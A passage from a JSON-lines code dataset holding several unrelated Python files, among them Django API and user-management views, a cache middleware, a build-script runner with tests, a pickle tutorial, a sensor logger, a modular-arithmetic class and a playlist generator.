reputation.models import Visitor, Visit\r\nfrom threat import Reputation\r\nfrom .serializers import DetailSerializer, VisitorSerializer\r\n\r\n\r\ndef random_string(length):\r\n return \"\".join([\r\n random.choice(string.digits) \\\r\n for _ in range(length)])\r\n\r\ndef year_from_now():\r\n return datetime.datetime.now() + datetime.timedelta(days=365)\r\n\r\n\r\nclass APIRoot(APIView):\r\n def get(self, request):\r\n return Response({\r\n 'IP Details': reverse(\r\n 'threat_details',\r\n kwargs={'ip_address': '1.2.3.4'},\r\n request=request),\r\n })\r\n\r\n\r\nclass IPDetailsView(APIView):\r\n \"\"\"\r\n IPDetail resource.\r\n \"\"\"\r\n def get(self, request, *args, **kwargs):\r\n \"\"\"\r\n Return details for a given ip address.\r\n ---\r\n serializer: reputation.serializers.DetailSerializer\r\n \"\"\"\r\n ip_address = kwargs.get('ip_address')\r\n endpoint = reverse('threat_details',\r\n kwargs={'ip_address': kwargs.get('ip_address')})\r\n\r\n details = Reputation.get_details(ip_address)\r\n detail_data = {}\r\n if not details is None:\r\n if details == u'':\r\n detail_data.update({'address': ip_address})\r\n else:\r\n detail_data = json.loads(details)\r\n result = DetailSerializer(data=detail_data)\r\n result.is_valid()\r\n \r\n response = Response(result.data, status=status.HTTP_200_OK)\r\n tracking_cookie = request.COOKIES.get(settings.TRACKING_COOKIE)\r\n if not tracking_cookie:\r\n tracking_cookie = random_string(12)\r\n response.set_cookie(\r\n settings.TRACKING_COOKIE,\r\n tracking_cookie,\r\n expires=year_from_now())\r\n Visit.objects.create_visit(\r\n tracking_cookie, ip_address, endpoint)\r\n return response\r\n\r\n\r\nclass VisitorListView(ListAPIView):\r\n \"\"\"\r\n Api traffic details.\r\n \"\"\"\r\n model = Visitor\r\n queryset = Visitor.objects.all().order_by('alienvaultid')\r\n serializer_class = VisitorSerializer\r\n","sub_path":"reputation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"172566477","text":"import re\n\nfrom django.db.models import Max\nfrom django.middleware.cache import CacheMiddleware\nfrom django.utils.cache import learn_cache_key, get_max_age\n\nfrom .models import Dataset, Resource\n\n\nclass MetadataCacheMiddleware(CacheMiddleware):\n\n path_patterns = (\n re.compile(r'^/$'),\n re.compile(r'^/api/v1/datasets/'),\n re.compile(r'^/api/v1/files/')\n )\n\n def process_request(self, request):\n self.result = self.check_path_info(request.path_info)\n if self.result:\n self.update_cache()\n return super().process_request(request)\n else:\n return None\n\n def process_response(self, request, response):\n if self.result:\n # this is a limited version of process_response in UpdateCacheMiddleware\n # which does not set the headers to let the client cache the response as well\n if not self._should_update_cache(request, response):\n return response\n\n timeout = self.cache_timeout\n if timeout and response.status_code == 200:\n cache_key = learn_cache_key(request, response, timeout, self.key_prefix, cache=self.cache)\n response.add_post_render_callback(lambda r: self.cache.set(cache_key, r, timeout))\n\n return response\n\n def check_path_info(self, path_info):\n return any(pattern.search(path_info) for pattern in self.path_patterns)\n\n def update_cache(self):\n # get the cache_timestamp from the cache\n cache_timestamp = self.cache.get('timestamp')\n\n # get the latest timestamp from the datasets and resources table\n timestamp_values = [\n value for value in Dataset.objects.using('metadata').aggregate(\n Max('created'),\n Max('updated'),\n Max('published'),\n Max('archived')\n ).values() if value is not None\n ] + [\n value for value in Resource.objects.using('metadata').aggregate(\n Max('created'),\n Max('updated')\n ).values() if value is not None\n ]\n timestamp = max(timestamp_values) if timestamp_values else None\n\n # check if the timestamp is later than cache_timestamp\n if cache_timestamp is None or timestamp is None or timestamp > cache_timestamp:\n # the datasets table has changed, clear the cache and set a new timestamp\n self.cache.clear()\n self.cache.set('timestamp', timestamp, self.cache_timeout)\n","sub_path":"isimip_data/metadata/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"62970103","text":"# DExTer : Debugging Experience Tester\n# ~~~~~~ ~ ~~ ~ ~~\n#\n# Copyright (c) 2018 by SN Systems Ltd., Sony Interactive Entertainment Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"Deals with the processing execution of shell or batch build scripts.\"\"\"\n\nimport os\nimport subprocess\nimport unittest\n\nfrom dex.dextIR import BuilderIR\nfrom dex.utils import Timer\nfrom dex.utils.Exceptions import BuildScriptException\n\n\ndef _quotify(text):\n if '\"' in text or ' ' not in text:\n return text\n return '\"{}\"'.format(text)\n\n\ndef _expand_text_replacements(text, source_files, compiler_options,\n linker_options, executable_file):\n\n source_files = [_quotify(f) for f in source_files]\n object_files = [\n _quotify('{}.o'.format(os.path.basename(f))) for f in source_files\n ]\n source_indexes = ['{:02d}'.format(i + 1) for i in range(len(source_files))]\n\n replacements = {}\n replacements['SOURCE_INDEXES'] = ' '.join(source_indexes)\n replacements['SOURCE_FILES'] = ' '.join(source_files)\n replacements['OBJECT_FILES'] = ' '.join(object_files)\n replacements['LINKER_OPTIONS'] = linker_options\n\n for i, _ in enumerate(source_files):\n index = source_indexes[i]\n replacements['SOURCE_FILE_{}'.format(index)] = source_files[i]\n replacements['OBJECT_FILE_{}'.format(index)] = object_files[i]\n replacements['COMPILER_OPTIONS_{}'.format(index)] = compiler_options[i]\n\n replacements['EXECUTABLE_FILE'] = executable_file\n\n try:\n return replacements, text.format(**replacements)\n except KeyError as e:\n raise BuildScriptException('could not expand variable {}.\\n'\n 'Available expansions are: {}'.format(\n e, ', '.join(\n sorted(replacements.keys()))))\n\n\ndef run_external_build_script(context, script_path, source_files,\n compiler_options, linker_options,\n executable_file):\n\n builderIR = BuilderIR(\n name=context.options.builder,\n cflags=compiler_options,\n ldflags=linker_options,\n )\n tmp_script_path = os.path.join(context.working_directory.path,\n os.path.basename(script_path))\n\n assert len(source_files) == len(compiler_options), (source_files,\n compiler_options)\n\n with open(script_path, 'r') as fp:\n text = fp.read()\n\n try:\n replacements, text = _expand_text_replacements(\n text, source_files, compiler_options, linker_options,\n executable_file)\n except BuildScriptException as e:\n raise BuildScriptException('{}: {}'.format(script_path, e))\n\n with open(tmp_script_path, 'w') as fp:\n fp.write(text)\n\n os.chmod(tmp_script_path, os.stat(script_path).st_mode)\n\n env = dict(os.environ)\n env.update(replacements)\n try:\n with Timer('running build script'):\n process = subprocess.Popen(\n [tmp_script_path],\n cwd=context.working_directory.path,\n env=env,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = process.communicate()\n returncode = process.returncode\n if returncode != 0:\n raise BuildScriptException(\n '{}: failed with returncode {}.\\nstdout:\\n{}\\n\\nstderr:\\n{}\\n'.\n format(script_path, returncode, out, err),\n script_error=err)\n return out.decode('utf-8'), err.decode('utf-8'), builderIR\n except OSError as e:\n raise BuildScriptException('{}: {}'.format(e.strerror, script_path))\n\n\nclass TestBuilder(unittest.TestCase):\n def test_expand_text_replacements(self):\n text = ''\n source_files = ['a.a']\n compiler_options = ['-option1 value1']\n linker_options = '-optionX valueX'\n executable_file = 'exe.exe'\n\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n\n self.assertEqual(result, '')\n\n text = '{SOURCE_FILES}'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'a.a')\n\n text = '{SOURCE_FILE_01}'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'a.a')\n\n text = '{SOURCE_FILE_02}'\n with self.assertRaises(BuildScriptException):\n _expand_text_replacements(text, source_files, compiler_options,\n linker_options, executable_file)\n\n text = '{COMPILER_OPTIONS_01}'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, '-option1 value1')\n\n text = '{COMPILER_OPTIONS_02}'\n with self.assertRaises(BuildScriptException):\n _expand_text_replacements(text, source_files, compiler_options,\n linker_options, executable_file)\n\n text = '{EXECUTABLE_FILE}'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'exe.exe')\n\n text = '{FOO}'\n with self.assertRaises(BuildScriptException):\n _expand_text_replacements(text, source_files, compiler_options,\n linker_options, executable_file)\n\n text = (\n 'xx {SOURCE_FILE_01} yy {COMPILER_OPTIONS_01} zz {EXECUTABLE_FILE}'\n )\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx a.a yy -option1 value1 zz exe.exe')\n\n source_files = ['a.a', 'b.b']\n compiler_options = ['-option1 value1', '-option2 value2']\n\n text = 'xx {SOURCE_FILES} yy'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx a.a b.b yy')\n\n text = 'xx {SOURCE_FILE_01} yy {COMPILER_OPTIONS_01} zz'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx a.a yy -option1 value1 zz')\n\n text = 'xx {SOURCE_FILE_01} yy {COMPILER_OPTIONS_02} zz'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx a.a yy -option2 value2 zz')\n\n text = 'xx {SOURCE_FILE_02} yy {COMPILER_OPTIONS_01} zz'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx b.b yy -option1 value1 zz')\n\n text = 'xx {SOURCE_FILE_02} yy {COMPILER_OPTIONS_02} zz'\n result = _expand_text_replacements(text, source_files,\n compiler_options, linker_options,\n executable_file)[1]\n self.assertEqual(result, 'xx b.b yy -option2 value2 zz')\n","sub_path":"dex/builder/Builder.py","file_name":"Builder.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"512117209","text":"import pickle\nimport bz2\nimport multiprocessing as mp\nfrom math import cos\nimport dill\nimport pathos.multiprocessing as mp\n\n#pickle\ndogs_dict = { 'Ozzy': 3, 'Filou': 8, 'Luna': 5, 'Skippy': 10, 'Barco': 12, 'Balou': 9, 'Laika': 16 }\n\nfilename = 'dogs'\noutfile = open(filename,'wb')\n\npickle.dump(dogs_dict,outfile)\noutfile.close()\n\n#unpickle\ninfile = open(filename,'rb')\nnew_dict = pickle.load(infile)\ninfile.close()\n\nprint(new_dict)\nprint(new_dict==dogs_dict)\nprint(type(new_dict))\n\n#compress a pickle file to reuce size\nsfile = bz2.BZ2File('smallerfile', 'w')\npickle.dump(dogs_dict, sfile)\n\n##unpickle python2 objects in python 3\n#infile = open(filename,'rb')\n#new_dict = pickle.load(infile, encoding='latin1')\n\n##In case of python2 objects having numpy arrays\n#new_dict = pickle.load(infile, encoding='bytes')\n\n#multiprocessing\n'''Processes do not share memory space, so when they have to send information to each other, they use serialization, which is done using the pickle module.'''\n\np = mp.Pool(2) #amount of processors to use\np.map(cos, range(10))\nprint (p.map(cos, range(10)))\n\n#Remember that lambda functions can't be pickled. So if you try to apply multiprocessing to a lambda function, it will fail.\ndill.dump(lambda x: x**2, open('dillfile','wb'))\n\n'''To use multiprocessing with a lambda function, or other data types unsupported by pickle, you will have to use a fork of multiprocessing called pathos.multiprocessing'''\np = mp.Pool(2)\nlambda_map = p.map(lambda x: 2**x, range(10))\n\nfilename = 'lambda_dump'\noutfile = open(filename,'wb')\ndill.dump(lambda_map,outfile)\noutfile.close()\n\ninfile = open(filename,'rb')\nnew_map = dill.load(infile)\ninfile.close()\n\nprint(new_map)\nprint(new_map==lambda_map)\nprint(type(new_map))\n","sub_path":"hw1/practiseCodesForHW1/pickelTest.py","file_name":"pickelTest.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608417077","text":"import collections\ndef finddupli(array):\n countarr=collections.Counter(array)\n #print (countarr)\n result=[i for i in countarr if countarr[i]>1]\n if len(result)==0:\n print (\"\\nThere is no Duplicates in O(n) time in the given array.\")\n exit(0)\n print (\"\\nDuplicates in O(n) time in the given array:\",\" \".join(map(str,result)))\n\n\narray=[1, 2, 3, 1, 3, 6, 6]\n#array=[1,2,3,4]\nprint (\"\\nGiven array:\",array)\nfinddupli(array)\n","sub_path":"arrays/q20_finddupli_orderofntime.py","file_name":"q20_finddupli_orderofntime.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516428132","text":"from django.shortcuts import render, redirect\nfrom .models import Post\nfrom .forms import PostForm\n\n# Create your views here.\ndef post_list(request):\n post_list = Post.objects.all()\n return render(request, 'blog/post_list.html', {\n 'post_list':post_list\n })\n\ndef post_detail(request, pk):\n post = Post.objects.get(pk=pk)\n return render(request, 'blog/post_detail.html', {\n 'post':post\n })\n\ndef post_new(request):\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n post = form.save()\n return redirect('blog:post_list')\n else:\n form = PostForm()\n return render(request, 'blog/post_form.html', {\n 'form':form\n })","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"395434833","text":"import logging\nimport time\nimport RPi.GPIO as GPIO\nimport dht11\nimport datetime\n \nfrom logging.handlers import RotatingFileHandler\n\n# intialize GPIO\nGPIO.setwarnings(True)\nGPIO.setmode(GPIO.BCM)\n\n#read data using pin 4\ninstance = dht11.DHT11(pin=4)\n\n#set path and name for log files\npath = \"/home/pi/Desktop/log/dht11.log\"\n\n#create rotating log and set level\nlogger = logging.getLogger(\"Rotating Log\")\nlogger.setLevel(logging.INFO)\n\n#specify the log size and log file count. 200 bytes will allow 3 logs per file\nhandler = RotatingFileHandler(path, maxBytes=200, backupCount=5)\nlogger.addHandler(handler)\n\n#run by default\n\ntry:\n while True:\n result = instance.read()\n if result.is_valid():\n #send output to log file\n logger.info(\"Time \" + str(datetime.datetime.now()) + \" Temperature: %d F \" % ((result.temperature*9/5)+32) + \"Humidity: %-3.1f%%\"% (result.humidity))\n #send output to shell\n print(\"Time \" + str(datetime.datetime.now()) + \" Temperature: %d F \" % ((result.temperature*9/5)+32) + \"Humidity: %-3.1f%%\"% (result.humidity))\n \n time.sleep(1)\n\nexcept KeyboardInterrupt:\n print(\"Cleanup\")\n GPIO.cleanup()\n \n \n \n \n \n","sub_path":"collect_dht11.py","file_name":"collect_dht11.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590154681","text":"from AbstrakteRinge import *\n#from Extension.Primzahl import aks\n\n# Zufall:\n\nfrom random import randint\n\n\n\nclass GanzzahlRestklassenring(Ring):\n\n \"\"\"Instanziierbare Klasse\"\"\"\n\n\n def __init__(self,modulus : int):\n \n if not isinstance(modulus,int):\n raise RuntimeError(\"Das angegebene Objekt ist keine ganze Zahl.\")\n if modulus <= 0:\n raise RuntimeError(\"Der Modulus ist nicht positiv.\")\n\n self.modulus = modulus\n self.null = GanzzahlRestklassenringElement(0,self)\n self.eins = GanzzahlRestklassenringElement(1,self)\n self.ist_endlicher_koerper = True\n self.elements = []\n self._frier()\n\n def __str__(self):\n \n return \"Z/{0}Z\".format(self.modulus)\n \n \n def __eq__(self,other):\n \n if not super().__eq__(other):\n return False\n return (self.modulus == other.modulus)\n\n\n def element(self,a):\n return GanzzahlRestklassenringElement(a,self)\n\n\n def zufaellig(self):\n return GanzzahlRestklassenringElement(randint(0,self.modulus-1),self.modulus)\n\n\n\nclass GanzzahlRestklassenringElement(RingElement):\n \n \"\"\"Instanziierbare Klasse\"\"\"\n \n def __init__(self,a,n):\n \n if isinstance(n,int):\n if n <= 0:\n raise RuntimeError(\"Der Modulus ist nicht positiv.\")\n self.ring =GanzzahlRestklassenring(n)\n\n elif isinstance(n,GanzzahlRestklassenring):\n self.ring = n\n\n else:\n raise RuntimeError(\"Das zweite angegebene Objekt ist keine Zahl und kein Ganzzahl-Restklassenring.\")\n\n if type(a) == int:\n\n self.wert = a % self.ring.modulus\n\n elif type(a) == GanzzahlRestklassenringElement:\n\n if a.ring.modulus % self.ring.modulus == 0:\n self.wert = a.wert % self.ring.modulus\n\n else:\n raise RuntimeError(\"Die Moduli passen nicht zusammen.\")\n\n else:\n raise RuntimeError(\"Das erste angegebene Objekt ist keine Zahl und kein Ganzzahl-Restklassenringelement.\")\n\n self._frier()\n\n\n def drucke_element(self):\n\n return \"[{0}]\".format(self.wert)\n\n\n\n def __eq__(self,other):\n\n if not super().__eq__(other):\n return False\n return self.wert == other.wert\n\n \n\n # Jetzt kommt das Überladen / Definieren der arithmetischen Operatoren\n\n \n def __neg__(self):\n\n return GanzzahlRestklassenringElement(-self.wert, self.ring)\n\n\n def __radd__(self,other):\n \n super().__radd__(other)\n\n if type(other) == int:\n return GanzzahlRestklassenringElement(self.wert+other,self.ring)\n\n return GanzzahlRestklassenringElement(self.wert+other.wert,self.ring)\n\n \n\n def __rmul__(self,other):\n \n super().__rmul__(other)\n\n # Der eine Faktor ist a:\n # Dieser Faktor ist ein Ringelement:\n \n a = self\n \n # Der andere Faktor ist b\n # Die Eingabe ist ja: other*self\n # Die Bedingung lautet: other muss entweder eine Zahl sein\n # oder ein Ganzzahl-Restklassenringelement, dessen modulus\n # ein Vielfaches von dem von a ist:\n # Dieser Faktor wird (zunächst) als Zahl dargestellt. \n\n if type(other) == int:\n b = other\n elif (isinstance(other,GanzzahlRestklassenringElement) and \n other.ring.modulus % self.ring.modulus == 0):\n b = other.wert % self.ring.modulus\n else:\n raise RuntimeError(\"Die Elemente können nicht multipliziert werden.\")\n \n # Umwandlung in 2-adische Schreibweise:\n \n zweiadisch = zwei_adisch(b)\n\n # Jetzt kommt double-and-add\n\n\n c = self.ring.null\n\n for i in range (0,len(zweiadisch)-1):\n if zweiadisch[i] == '1':\n c = c + a\n c = c + c\n\n # Am Ende muss man noch einmal addieren, ohne zu multiplizieren.\n \n if (len(zweiadisch) > 0 \n and zweiadisch[len(zweiadisch)-1] == '1'):\n c = c + a\n\n return c\n\n\n\n def invers(self):\n\n a = self.wert\n b = self.ring.modulus\n\n u, s = GanzzahlRestklassenringElement(1,self.ring), GanzzahlRestklassenringElement(0,self.ring)\n\n # Sehr kompakte GGT-Modulo-Berechnung\n while b!=0:\n q=a//b\n a, b = b, a-q*b\n u, s = s, u-q*s\n\n if a != 1:\n raise InvertierungsFehler(self)\n\n return u\n\n","sub_path":"tocas/GanzzahlRestklassenringe.py","file_name":"GanzzahlRestklassenringe.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38133033","text":"from django_mako_plus.controller.router import get_renderer\nfrom django_mako_plus.controller import view_function\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nimport datetime\nfrom django import forms\nimport homepage.models as hmod\n\ntemplater = get_renderer('manager')\n\n'''\n users: CRUD functions for users\n\n'''\n\n@view_function\ndef process_request(request):\n '''\n process_request: Return list of users, sorted by last name\n '''\n params = {}\n\n # get list of users, sorted by last name\n users = hmod.User.objects.all().order_by('last_name')\n\n # pass list to template\n params['users'] = users\n\n return templater.render_to_response(request, 'users.html', params)\n\n@view_function\ndef create(request):\n '''\n create: Creates empty user, sends user to edit page\n '''\n\n params = {}\n\n user = hmod.User()\n user.username = ''\n user.last_name = ''\n user.first_name = ''\n user.email = ''\n user.phone = ''\n\n user.save()\n\n # send user to edit page\n return HttpResponseRedirect('/manager/users.edit/{}'.format(user.id))\n\n@view_function\ndef edit(request):\n '''\n edit: Sends form for editing user details\n '''\n\n params = {}\n\n # try to get user\n try:\n user = hmod.User.objects.get(id = request.urlparams[0])\n except hmod.User.DoesNotExist:\n # redirect to user list page\n return HttpResponseRedirect('/manager/users/')\n\n # initialize event user form\n form = UserEditForm(initial={\n 'username' : user.username,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'email': user.email,\n 'phone': user.phone,\n\n })\n\n # if POST\n if request.method == 'POST':\n # get form from request\n form = UserEditForm(request.POST)\n\n # for use in clean method\n form.user_id = user.id\n\n # if form is valid\n if form.is_valid():\n\n # edit user object\n user.username = form.cleaned_data['username']\n user.first_name = form.cleaned_data['first_name']\n user.last_name = form.cleaned_data['last_name']\n user.email = form.cleaned_data['email']\n user.phone = form.cleaned_data['phone']\n\n user.save()\n\n if form.cleaned_data['password'] != '':\n\n user.set_password(form.cleaned_data['password'])\n\n\n user.save()\n\n # send to event list page\n return HttpResponseRedirect('/manager/users/')\n\n\n params['form'] = form\n\n return templater.render_to_response(request, 'events.edit.html', params)\n\n@view_function\ndef delete(request):\n '''\n delete: Deletes selected user\n '''\n\n params = {}\n\n # try and get user\n try:\n user = hmod.User.objects.get(id=request.urlparams[0])\n\n # if user does not exist\n except hmod.User.DoesNotExist:\n\n # go back to user list page\n return HttpResponseRedirect('/manager/users/')\n\n\n # else, delete user\n user.delete()\n\n # return to user list page\n return HttpResponseRedirect('/manager/users/')\n\n\nclass UserEditForm(forms.Form):\n '''\n UserEditForm: Fields to edit user username, password, first_name, last_name, email, phone\n '''\n username = forms.CharField(label=\"Username\", required=True, max_length=100)\n password = forms.CharField(label=\"Password\", required=False, widget = forms.PasswordInput)\n first_name = forms.CharField(label=\"First Name\",required=True, max_length=100)\n last_name = forms.CharField(label=\"Last Name\", required=True, max_length=100)\n email = forms.EmailField(label=\"Email\", required=True, max_length=100)\n phone = forms.CharField(label=\"Phone\", required=True, max_length=100)\n\n def clean_username(self):\n # check if username is unique\n user = hmod.User.objects.filter(username=self.cleaned_data['username']).exclude(id=self.user_id)\n\n if user.count() > 0:\n raise forms.ValidationError('%s already exists' % self.cleaned_data['username'])\n\n return self.cleaned_data['username']\n","sub_path":"IS 413/INTEX/manager/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"47430520","text":"import sqlalchemy\nimport random\nfrom database.Basedonnees_initiation import table_morceaux, connection as conn\nfrom creationfichier.fichier import M3U, XSPF, PLS\n\n#Définition d'une variable regroupant un ensemble d'arguments\nargument_cli = ['titrePlaylist','artistePlaylist','albumPlaylist','genrePlaylist']\n\n#Définition de la playlist\nmusiquePlayList =[] #Musique PlayList\n\n\"\"\"\nFonction permettant de récupérer des données dans la BDD par rapport aux besoins de l'utilisateur\n:param a: les arguments saisis par l'utilisateur\n\"\"\"\n\ndef recupererDonnees(args):\n for attribut in argument_cli:\n if getattr(args, attribut) is not None:\n for argument in getattr(args, attribut):\n #Récupération des données dans la base pour chaque argument ci-dessous\n if (attribut == 'titrePlaylist'):\n RecuperationDonnees = sqlalchemy.select([table_morceaux]).where(table_morceaux.c.titre == argument[0])\n #Récupération des données dans la base pour chaque argument ci-dessous\n if (attribut == 'artistePlaylist'):\n RecuperationDonnees = sqlalchemy.select([table_morceaux]).where(table_morceaux.c.artiste == argument[0])\n #Récupération des données dans la base pour chaque argument ci-dessous\n if (attribut == 'albumPlaylist'):\n RecuperationDonnees = sqlalchemy.select([table_morceaux]).where(table_morceaux.c.album == argument[0])\n #Récupération des données dans la base pour chaque argument ci-dessous\n if (attribut== 'genrePlaylist'):\n RecuperationDonnees = sqlalchemy.select([table_morceaux]).where(table_morceaux.c.genre == argument[0])\n\n # Connection à la base de données suivi de l'execution de la requète\n recuperation = conn.execute(RecuperationDonnees)\n #Insere les données récuperées dans un list\n recuperation = list(recuperation)\n #Melange la musique dans la list\n random.shuffle(recuperation)\n \n \n argument.insert(2,[]) #Création d'une liste en 3eme position des arguments ex : rock 70 []\n #Initialisation de la valeur à 0\n i=0 \n #Initialisation de la valeur à 0\n duree = 0 \n \n for champBDD in recuperation: \n #Pour chaque musique recuperer dans la liste, on vérifie la durée afin de correspondre au mieux au demande de l'utilisateur\n duree += champBDD[5] \n #Correspond au champ durée dans la BDD\n if(duree < argument[1]*60): \n #Si durée inf. à durée demandé par utilisateur + conversion en secondes\n argument[2].insert(i, champBDD) #Insertion de la musique convertit et vérifié dans la liste\n i += 1\n \n else:\n duree -= champBDD[5] \n #Correspond au champ durée dans la BDD\n \n\"\"\"\nGénération de la liste de playlist\n:param a: la liste des arguments saisis par l'utilisateur\n\"\"\"\ndef generationPlaylist(args):\n i = 0\n for attribut in argument_cli:\n if getattr(args, attribut) is not None:\n for argument in getattr(args, attribut):\n for musique in argument[2]: # Pour chaque musique dans la playlist on insére le titre, l'artiste, l'album, le format et le chemin \n musiquePlayList.insert(i, [musique[0], musique[2], musique[1], musique[5], musique[8]])\n i += 1\n random.shuffle(musiquePlayList) #On mélange les musiques aléatoirement\n \n\"\"\"\nToutes les vérifications pour mener à bien l'éxecution du programme.\n:param a: liste des arguments\n\"\"\"\ndef Playlist(args):\n duree = 0 #initialisation à 0\n for musique in musiquePlayList: #Pour chaque musique dans la playlist selon un genre précis\n duree += musique[3]\n \n if(duree < args.dureePlaylist*60): #Si la duree de la musique est inférieur à la durée totale demandée par l'utilisateur on effectue la requête permettant d'aller chercher des musiques alétoirement dans la base correspondant au genre\n select_morceaux = sqlalchemy.select([table_morceaux])\n resultat = conn.execute(select_morceaux)\n resultat = list(resultat)\n random.shuffle(resultat)\n \n i=len(musiquePlayList)\n for musique in resultat:\n duree += musique[5] # on vérifie que la durée d'un musique ne dépasse pas la durée de la playlist demandée, si c'est le cas, on insére à nouveau une musique aléatoirement\n if(duree < args.dureePlaylist*60):\n musiquePlayList.insert(i, [musique[0], musique[2], musique[1], musique[5], musique[8]])\n i += 1\n else:\n duree -= musique[5] # Si ce n'est pas le cas, on enlève la musique et on en sélectionne une moins grande pour compléter la playlist avec le moins d'écart possible\n return duree\n\n\"\"\"\nOn gére l'écriture du fichier dans les 3 formats proposés\n:param a: les arguments\n:param b: les musiques de la playlist\n\"\"\"\ndef EcritureFichier(args, musiquePlayList):\n if(args.formatPlaylist == 'm3u'):\n M3U(args, musiquePlayList)\n if(args.formatPlaylist == 'xspf'):\n XSPF(args, musiquePlayList)\n if(args.formatPlaylist == 'pls'):\n PLS(args, musiquePlayList)\n\n","sub_path":"database/recuperationdonnees.py","file_name":"recuperationdonnees.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"281345206","text":"test_cases = [\n '()',\n '(())',\n '()()',\n '([])',\n '([])',\n '([)]',\n '{{}()[()]}',\n '{[]{()}{{{{{{}',\n]\n\n#b_open = ['(', '[', '{']\n#b_close = [')', ']', '}']\n\nbrackets = dict()\nbrackets['('] = ')'\nbrackets['['] = ']'\nbrackets['{'] = '}'\n\ndef is_balanced(s: str) -> bool:\n stack = list()\n for c in s:\n if c in brackets.keys():\n stack.append(c)\n elif c in brackets.values():\n d = stack.pop()\n if brackets[d] != c:\n return False\n if len(stack):\n return False\n return True\n\nfor tst in test_cases:\n print(\"Test case:\", tst, \"Result:\", is_balanced(tst))","sub_path":"daily/daily_20190513.py","file_name":"daily_20190513.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566922762","text":"# -*- coding: utf-8 -*-\n\"\"\"Restore a deleted StoredFileNode. If the file was reuploaded, renames the file\nto (restored).. For example, README.rst would be renamed to README (restored).rst.\n\n python -m scripts.restore_file 123ab --dry\n python -m scripts.restore_file 123ab\n\n\"\"\"\nimport sys\nimport logging\n\nfrom framework.transactions.context import TokuTransaction\nfrom website.app import init_app\nfrom website.files.models.base import TrashedFileNode, StoredFileNode\nfrom scripts import utils as script_utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n init_app(routes=False)\n dry = '--dry' in sys.argv\n if not dry:\n script_utils.add_file_logger(logger, __file__)\n with TokuTransaction():\n stored = StoredFileNode.find().get_keys()\n trashed = TrashedFileNode.find().get_keys()\n\n stored_set = set(stored)\n trashed_set = set(trashed)\n\n intersection = trashed_set & stored_set\n\n print('There are {} restored trashed file nodes'.format(len(intersection)))\n\n for trash_id in intersection:\n TrashedFileNode.remove_one(trash_id)\n print('Removed TrashedFileNode {}'.format(trash_id))\n\n if dry:\n raise RuntimeError('Dry run - rolling back transaction')\n\nif __name__ == \"__main__\":\n 